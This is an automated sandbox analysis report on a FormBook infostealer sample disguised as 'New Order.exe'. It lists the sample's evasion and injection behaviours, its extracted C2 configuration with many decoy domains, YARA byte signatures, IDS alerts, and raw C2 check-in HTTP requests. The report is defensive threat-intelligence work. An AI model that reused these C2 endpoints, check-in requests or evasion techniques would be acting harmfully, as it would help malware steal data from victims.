Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report New Order.exe

Overview

General Information

Sample Name:New Order.exe
Analysis ID:438531
MD5:4af03301316c984c17ca822456b6d918
SHA1:ad237296e61bde6fe8ba894ec7445bb9bc76ab69
SHA256:ac339f7ecac47cfc3a860ad42986d9f8d68208e7c7df8b21d4640ade4f2b5131
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New Order.exe (PID: 7044 cmdline: 'C:\Users\user\Desktop\New Order.exe' MD5: 4AF03301316C984C17CA822456B6D918)
    • New Order.exe (PID: 7108 cmdline: 'C:\Users\user\Desktop\New Order.exe' MD5: 4AF03301316C984C17CA822456B6D918)
  • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • wscript.exe (PID: 5884 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 6416 cmdline: /c del 'C:\Users\user\Desktop\New Order.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.achainz.com/de52/"], "decoy": ["securenotifications.com", "queenannedelights.com", "ametistadigital.com", "nebraskapaymentrelief.net", "biologicsas.com", "vidalifegroupeurope.com", "sedulabs.com", "relaxingread.com", "oucompany.com", "ty-valve.com", "noakum.com", "neuralinkages.com", "heirsfriend.net", "collectordrive.com", "holidayrefers.com", "rhodessunbed.com", "smartlearningservice.com", "gangju123.com", "yymh8826.com", "ssmgaezp.icu", "nagosemo.store", "czzubniimplantaty.com", "cuttingemporium.com", "sapphireresortapts.com", "thingsnice.com", "occasionalassistant.com", "dietsz.com", "agenciaay.com", "sahaazancosmetics.com", "citizenshipswap.com", "tarjetasbogota.com", "naughtyofficegirls.today", "pamcakedesigns.com", "mytopshelfcloset.com", "optimismactivism.com", "ecard07.com", "ravexim3.com", "1677onyx.com", "blossomkc.com", "havdalahwomen.com", "centraldot.xyz", "runtilltheresnone.com", "alisonhahn.com", "mikesyardsale.com", "ayanmobile.com", "riseframework.com", "intermittentfastingcbd.com", "fahn555.icu", "triumphosophy.com", "mns6238.com", "sallyta.com", "miqr.art", "canadance.net", "poisedbylanaburroughs.com", "artistasmarbella.com", "multimater.info", "trapapa-bitter-nr1-bb.com", "naijadelivery.com", "365killoffices.xyz", "cmvtholiday.taipei", "bespokephysicaltherapy.com", "candlewands.com", "tabakico.com", "domentemenegi39.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.New Order.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.New Order.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.New Order.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        2.1.New Order.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.New Order.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.achainz.com/de52/"], "decoy": ["securenotifications.com", "queenannedelights.com", "ametistadigital.com", "nebraskapaymentrelief.net", "biologicsas.com", "vidalifegroupeurope.com", "sedulabs.com", "relaxingread.com", "oucompany.com", "ty-valve.com", "noakum.com", "neuralinkages.com", "heirsfriend.net", "collectordrive.com", "holidayrefers.com", "rhodessunbed.com", "smartlearningservice.com", "gangju123.com", "yymh8826.com", "ssmgaezp.icu", "nagosemo.store", "czzubniimplantaty.com", "cuttingemporium.com", "sapphireresortapts.com", "thingsnice.com", "occasionalassistant.com", "dietsz.com", "agenciaay.com", "sahaazancosmetics.com", "citizenshipswap.com", "tarjetasbogota.com", "naughtyofficegirls.today", "pamcakedesigns.com", "mytopshelfcloset.com", "optimismactivism.com", "ecard07.com", "ravexim3.com", "1677onyx.com", "blossomkc.com", "havdalahwomen.com", "centraldot.xyz", "runtilltheresnone.com", "alisonhahn.com", "mikesyardsale.com", "ayanmobile.com", "riseframework.com", "intermittentfastingcbd.com", "fahn555.icu", "triumphosophy.com", "mns6238.com", "sallyta.com", "miqr.art", "canadance.net", "poisedbylanaburroughs.com", "artistasmarbella.com", "multimater.info", "trapapa-bitter-nr1-bb.com", "naijadelivery.com", "365killoffices.xyz", "cmvtholiday.taipei", "bespokephysicaltherapy.com", "candlewands.com", "tabakico.com", "domentemenegi39.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: New Order.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: New Order.exeJoe Sandbox ML: detected
          Source: 5.2.wscript.exe.34180a8.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.2.wscript.exe.5957960.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.New Order.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.New Order.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.New Order.exe.22a0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: New Order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscript.pdbGCTL source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New Order.exe, 00000000.00000003.641817824.0000000009770000.00000004.00000001.sdmp, New Order.exe, 00000002.00000002.690473130.0000000000BC0000.00000040.00000001.sdmp, wscript.exe, 00000005.00000002.901871458.0000000005420000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New Order.exe, wscript.exe
          Source: Binary string: wscript.pdb source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\New Order.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49778 -> 35.209.88.35:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49778 -> 35.209.88.35:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49778 -> 35.209.88.35:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.achainz.com/de52/
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT HTTP/1.1Host: www.collectordrive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5/FFIvWjS8rmQthPplPuKqV&Yz=0bpDyT HTTP/1.1Host: www.dietsz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT HTTP/1.1Host: www.gangju123.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=VjXAIgKfhvF8hRWD/e05oFFe9piey6xRf/uiJW4aXhiEfFySQTYX7BGVKv+i/OP+5wGQ&Yz=0bpDyT HTTP/1.1Host: www.ayanmobile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=/MwPCQmb8N4Awmw4mMKJPRGOCBQ0FmS8LiYPDqoyki9FgjxxSyxFyKWOR1kxSGqMaJan&Yz=0bpDyT HTTP/1.1Host: www.securenotifications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT HTTP/1.1Host: www.cuttingemporium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=LwTVedL55OWwkv7g5+M8qNIWWWhwOSQTlz2nKf3SzAUgx635MxYM24Oa4PrOeZWczuGU&Yz=0bpDyT HTTP/1.1Host: www.optimismactivism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=qb+cDyZ+/Kn0EiG8qAwackOr+Z8XD7HPsMVV4+H0Ra088mc2au++kj7rvX/qHs87RHMJ&Yz=0bpDyT HTTP/1.1Host: www.occasionalassistant.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
          Source: Joe Sandbox ViewASN Name: TELECOM-HKHongKongTelecomGlobalDataCentreHK TELECOM-HKHongKongTelecomGlobalDataCentreHK
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT HTTP/1.1Host: www.collectordrive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5/FFIvWjS8rmQthPplPuKqV&Yz=0bpDyT HTTP/1.1Host: www.dietsz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT HTTP/1.1Host: www.gangju123.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=VjXAIgKfhvF8hRWD/e05oFFe9piey6xRf/uiJW4aXhiEfFySQTYX7BGVKv+i/OP+5wGQ&Yz=0bpDyT HTTP/1.1Host: www.ayanmobile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=/MwPCQmb8N4Awmw4mMKJPRGOCBQ0FmS8LiYPDqoyki9FgjxxSyxFyKWOR1kxSGqMaJan&Yz=0bpDyT HTTP/1.1Host: www.securenotifications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT HTTP/1.1Host: www.cuttingemporium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=LwTVedL55OWwkv7g5+M8qNIWWWhwOSQTlz2nKf3SzAUgx635MxYM24Oa4PrOeZWczuGU&Yz=0bpDyT HTTP/1.1Host: www.optimismactivism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de52/?z6Ad_8Jp=qb+cDyZ+/Kn0EiG8qAwackOr+Z8XD7HPsMVV4+H0Ra088mc2au++kj7rvX/qHs87RHMJ&Yz=0bpDyT HTTP/1.1Host: www.occasionalassistant.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.collectordrive.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Jun 2021 16:06:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:Data Raw: 31 33 64 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: New Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: New Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.648249693.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
